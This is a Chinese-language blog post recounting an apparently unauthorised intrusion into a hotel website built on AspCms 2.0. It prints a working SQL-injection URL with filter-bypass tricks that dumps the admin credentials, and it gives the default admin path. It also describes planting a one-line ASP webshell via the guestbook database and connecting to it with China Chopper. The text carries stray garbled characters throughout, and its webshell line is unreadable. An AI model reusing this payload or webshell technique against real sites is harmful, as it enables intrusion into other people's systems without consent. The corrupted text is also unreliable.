這是某個(gè)國(guó)際酒店的網(wǎng)站,由于使用了AspCms 2.0修赞,通過SQL注入我們很快可以拿下shell
此次測(cè)試中杆融,由于網(wǎng)站限制了所有的讀寫權(quán)限,由各種錯(cuò)誤唆樊,以及最后的小馬根本沒什么權(quán)限宛琅。
0x01 基礎(chǔ)信息:
簡(jiǎn)單看看指紋信息:
是ASPCMS的,通過一個(gè)通用SQL注入拿到管理員的賬號(hào)密碼:
EXP:
https://blog.dyboy.cn/plug/comment
/commentList.asp?id=0%20unmasterion%20
semasterlect%20top%201%20UserID,GroupID,
LoginName,Password,now%28%29,null,1%20%20
frmasterom%20%7bprefix%7duser
利用EXP直接獲得:
解密得到管理員
賬號(hào):admin
密碼:123456
0x02 深入測(cè)試:
后臺(tái)默認(rèn)為: https://blog.dyboy.cn/admin_aspcms/
登陸管理后臺(tái)
根據(jù)以前的添加模版的方法不可行逗旁,再多看幾下嘿辟,發(fā)現(xiàn)整個(gè)網(wǎng)站是沒有寫入權(quán)限的...
這里要提一個(gè)東西就是aspcms
默認(rèn)的留言板數(shù)據(jù)庫(kù)路徑:
https://blog.dyboy.cn/data/data.asp
有的我們?cè)诹粞园辶粞砸痪湓?/p>
┼攠數(shù)畣整爠煥敵瑳∨≡┩愾
密碼:a
菜刀連接 https://blog.dyboy.cn/data/data.asp 即可
因?yàn)檎麄€(gè)網(wǎng)站都沒有寫的權(quán)限舆瘪,應(yīng)該這個(gè)網(wǎng)站之前就有被入侵的經(jīng)歷吧,所以做了限制红伦,找到備份文件的地方英古,嘗試了一下,雖然顯示成功備份昙读,事實(shí)上不能備份召调。
因?yàn)椴荒苤苯酉螺d備份文件,就直接訪問備份文件蛮浑,發(fā)現(xiàn)一個(gè)有趣的東西:
有一個(gè) execute
語句唠叛,大家應(yīng)該有所想法的
然后死馬當(dāng)活馬醫(yī),直接菜刀鏈接備份數(shù)據(jù)庫(kù)文件沮稚,猜測(cè)密碼為a
艺沼,因?yàn)閿?shù)據(jù)庫(kù)文件比較大,所以每次的操作都會(huì)消耗較長(zhǎng)的時(shí)間
然后就這么就連上了...
前面也說了整個(gè)網(wǎng)站都沒權(quán)限壮虫,雞肋shell一個(gè)澳厢。
0x03 總結(jié):
shell是否有權(quán)限不重要环础,aspcms的都可以這么黑盒測(cè)試
提供一下這個(gè) ASPcms 2.0
的源碼下載地址:
http://down.admin5.com/asp/73162.html
空閑有能力的朋友可以審計(jì)一下囚似,ASP的我就會(huì)一句話[捂臉]...